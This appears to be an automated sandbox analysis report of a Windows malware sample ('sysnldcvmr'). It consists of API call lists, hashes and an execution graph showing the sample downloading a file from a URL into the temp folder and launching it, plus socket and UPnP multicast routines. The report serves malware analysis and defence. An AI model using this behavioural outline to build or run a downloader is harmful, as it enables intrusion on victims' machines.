                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 1378416451-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                                                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                                                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                                                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                                                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                                                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 528846559-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                                                                                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                                                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:36%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:85
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 250 5519d5 _except_handler4_common 200 5513f1 220 55197c 200->220 202 5513fd GetStartupInfoW 203 55142e InterlockedCompareExchange 202->203 204 55143b 203->204 206 55143f 203->206 205 551447 Sleep 204->205 204->206 205->203 207 551460 _amsg_exit 206->207 208 55146a 206->208 209 551493 207->209 208->209 210 551473 _initterm_e 208->210 211 5514a2 _initterm 209->211 212 5514bd 209->212 210->209 214 55148e __onexit 210->214 211->212 213 5514c2 InterlockedExchange 212->213 216 5514ca __IsNonwritableInCurrentImage 212->216 213->216 216->214 217 55154e exit 216->217 218 55159a 216->218 221 551340 Sleep 216->221 217->216 218->214 219 5515a2 _cexit 218->219 219->214 220->202 227 5512a0 ExpandEnvironmentStringsW wsprintfW 221->227 224 55137e 224->216 225 55135a GetTickCount srand Sleep 232 5510b0 9 API calls 225->232 228 5512e9 227->228 229 5512f3 CreateFileW 228->229 230 5512ed 228->230 229->230 231 55131e CloseHandle 229->231 230->224 230->225 231->230 233 551283 InternetCloseHandle 232->233 234 551173 InternetOpenUrlW 232->234 233->224 235 551276 InternetCloseHandle 234->235 236 5511a2 CreateFileW 234->236 235->233 237 5511d1 InternetReadFile 236->237 238 551269 CloseHandle 236->238 239 5511f5 237->239 240 551224 CloseHandle wsprintfW DeleteFileW 237->240 238->235 239->240 241 5511fe WriteFile 239->241 244 551000 memset memset CreateProcessW 240->244 241->237 245 551071 ShellExecuteW 244->245 246 551062 Sleep 244->246 248 551097 Sleep 245->248 249 5510a6 245->249 247 5510a8 246->247 247->238 248->247 249->247 251 5516b0 254 551a28 251->254 253 5516b5 253->253 255 551a4d 254->255 256 551a5a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 254->256 255->256 257 551a51 255->257 256->257 257->253 270 5515cf 272 5515dd __set_app_type _encode_pointer __p__fmode __p__commode 270->272 273 55167c _pre_c_init __RTC_Initialize 272->273 274 551696 273->274 275 55168a __setusermatherr 273->275 280 5519fa _controlfp_s 274->280 275->274 278 5516a4 _configthreadlocale 279 5516ad 278->279 281 551a16 _invoke_watson 280->281 282 55169b 280->282 281->282 282->278 282->279 258 55157e 259 551593 _exit 258->259 260 55159a 258->260 259->260 261 5515a2 _cexit 260->261 262 5515a8 __onexit 260->262 261->262 263 551af8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 264 551be2 _crt_debugger_hook 263->264 265 551bea GetCurrentProcess TerminateProcess 263->265 264->265 283 5513ab 288 5517b5 283->288 286 5513f0 287 5513e8 _amsg_exit 287->286 291 551710 288->291 290 5513b0 __wgetmainargs 290->286 290->287 298 55197c 291->298 293 55171c _decode_pointer 294 551733 _onexit 293->294 295 55173f 7 API calls 293->295 296 5517a3 __onexit 294->296 299 5517ac _unlock 295->299 296->290 298->293 299->296 266 5516ba 267 5516f6 266->267 269 5516cc 266->269 268 5516f1 ?terminate@ 268->267 269->267 269->268 300 55156a _XcptFilter

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 005510B9
                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 005510C0
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005510E0
                                                                                                                                                                                                                                                    • strlen.MSVCR90 ref: 005510EA
                                                                                                                                                                                                                                                    • mbstowcs.MSVCR90 ref: 00551101
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00551109
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 0055111D
